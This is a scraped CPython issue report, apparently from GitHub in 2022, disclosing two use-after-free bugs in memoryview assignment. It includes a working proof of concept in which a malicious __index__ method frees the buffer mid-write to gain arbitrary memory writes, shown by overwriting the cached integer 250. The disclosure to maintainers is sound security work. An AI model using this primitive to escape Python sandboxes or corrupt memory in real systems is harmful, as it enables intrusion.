René's URL Explorer Experiment

{"@context":"https://schema.org","@type":"DiscussionForumPosting","headline":"Use After Free when assigning into a memoryview","articleBody":"\u003c!--\r\n  If you're new to Python and you're not sure whether what you're experiencing is a bug, the CPython issue tracker is not\r\n  the right place to seek help. Consider the following options instead:\r\n\r\n  - reading the Python tutorial: https://docs.python.org/3/tutorial/\r\n  - posting in the \"Users\" category on discuss.python.org: https://discuss.python.org/c/users/7\r\n  - emailing the Python-list mailing list: https://mail.python.org/mailman/listinfo/python-list\r\n  - searching our issue tracker (https://github.com/python/cpython/issues) to see if\r\n    your problem has already been reported\r\n--\u003e\r\n\r\n**Bug report**\r\n\r\nwithin memoryview.c, I have found two Use After Frees, both based around `memory_ass_sub`. \r\nThe first is if a class with a malicious `__index__` method is used as the index for the assignment, its index method is called after the memoryview is checked if it is released. This allows the index method to release the memory view and backing buffer, leading to a write to freed memory when the write completes. The same vuln exists if the class with a malicious index method is used as the assigned value, as its `__index__` method is called inside of `pack_single`\r\n\r\n```py\r\n# memoryview Use After Free (memory_ass_sub)\r\nuaf_backing = bytearray(bytearray.__basicsize__)\r\nuaf_view = memoryview(uaf_backing).cast('n') # ssize_t format\r\n\r\nclass weird_index:\r\n    def __index__(self):\r\n        global memory_backing\r\n        uaf_view.release() # release memoryview (UAF)\r\n        # free `uaf_backing` memory and allocate a new bytearray into it\r\n        memory_backing = uaf_backing.clear() or bytearray()\r\n        return 2 # `ob_size` idx\r\n\r\n# by the time this line finishes executing, it writes the max ptr size\r\n# into the `ob_size` slot of `memory_backing`\r\nuaf_view[weird_index()] = (2 ** (tuple.__itemsize__ * 8) - 1) // 2\r\nmemory = memoryview(memory_backing)\r\nmemory[id(250) + int.__basicsize__] = 100\r\nprint(250) # prints 100\r\n```\r\n\r\n**Your environment**\r\n\r\n\u003c!-- Include as many relevant details as possible about the environment you experienced the bug in --\u003e\r\n\r\n- CPython versions tested on: Python 3.10.2 (main, Feb  2 2022, 07:36:01) [Clang 12.0.0 (clang-1200.0.32.29)] on darwin\r\n- Operating system and architecture: MacOS, 64bit\r\n\r\n\u003c!--\r\nYou can freely edit this text. Remove any lines you believe are unnecessary.\r\n--\u003e\r\n","author":{"url":"https://github.com/chilaxan","@type":"Person","name":"chilaxan"},"datePublished":"2022-05-17T18:35:03.000Z","interactionStatistic":{"@type":"InteractionCounter","interactionType":"https://schema.org/CommentAction","userInteractionCount":11},"url":"https://github.com/92888/cpython/issues/92888"}